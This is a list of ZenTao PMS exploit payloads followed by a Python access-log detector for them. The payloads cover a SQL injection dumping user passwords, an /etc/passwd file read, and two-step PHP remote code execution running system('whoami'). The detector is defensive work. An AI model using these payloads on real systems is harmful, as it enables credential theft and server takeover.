1. SQL injection vulnerability
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user
2. Arbitrary file read vulnerability
Payload:
http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd
3. Remote code execution vulnerability
1) Remote code execution, running phpinfo();
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111
POST: fileContent=<?php phpinfo(); ?>
Payload 2:
http://127.0.0.1/zentaopms/www/api-getModel-api-getMethod-filePath=1111/1
POST: fileContent=<?php phpinfo(); ?>
2) Remote code execution, running system('whoami');
Payload 1:
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222
POST: fileContent=<?php system('whoami'); ?>
Payload 2:
http://127.0.0.1/zentaopms/www/api-getModel-api-getMethod-filePath=2222/2
POST: fileContent=<?php system('whoami'); ?>
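All of the payloads above share one request shape, `api-getModel-<module>-<method>-<params>`, so a defender can flag them from web server access logs. The following detector is an added example written for this page, not part of the original write-up or of ZenTao; it assumes combined-format access logs and uses constructed sample lines with made-up source addresses.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (combined log format). The first four
# reproduce the request shapes listed above; the last one is a benign login page hit.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /zentaopms/www/api-getModel-editor-save-filePath=1111 HTTP/1.1" 200 64 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /zentaopms/www/api-getModel-api-getMethod-filePath=1111/1 HTTP/1.1" 200 64 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /zentaopms/www/index.php?m=user&f=login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "METHOD path proto", status ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Request shape used by every payload above: api-getModel-<module>-<method>-<params>
GETMODEL_RE = re.compile(r'/api-getModel-(?P<module>[A-Za-z]+)-(?P<func>[A-Za-z]+)(?:-(?P<params>.*))?$')

# Module.method pairs taken from the payloads above, mapped to the issue each one exposes.
RISKY_CALLS: Dict[str, str] = {
    "api.sql": "sql-injection",
    "file.parseCSV": "arbitrary-file-read",
    "editor.save": "remote-code-execution",
    "api.getMethod": "remote-code-execution",
}

def classify_request(path: str) -> Optional[Dict[str, str]]:
    """Return a finding for an api-getModel request path, or None for any other path."""
    m = GETMODEL_RE.search(path)
    if not m:
        return None
    call = f"{m.group('module')}.{m.group('func')}"
    # Any api-getModel call reaching the server is worth a look; known pairs get a precise label.
    return {"call": call, "params": m.group("params") or "",
            "risk": RISKY_CALLS.get(call, "api-getModel-exposed")}

def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line and collect findings for api-getModel requests."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        lm = LOG_RE.match(line)
        if not lm:
            continue
        finding = classify_request(lm.group("path"))
        if finding:
            finding.update(src=lm.group("src"), method=lm.group("method"), status=lm.group("status"))
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A 200 status on the `editor-save` request followed by a `getMethod` request for the same `filePath` is the sequence to alert on, since it matches the two-step pattern shown in the RCE payloads.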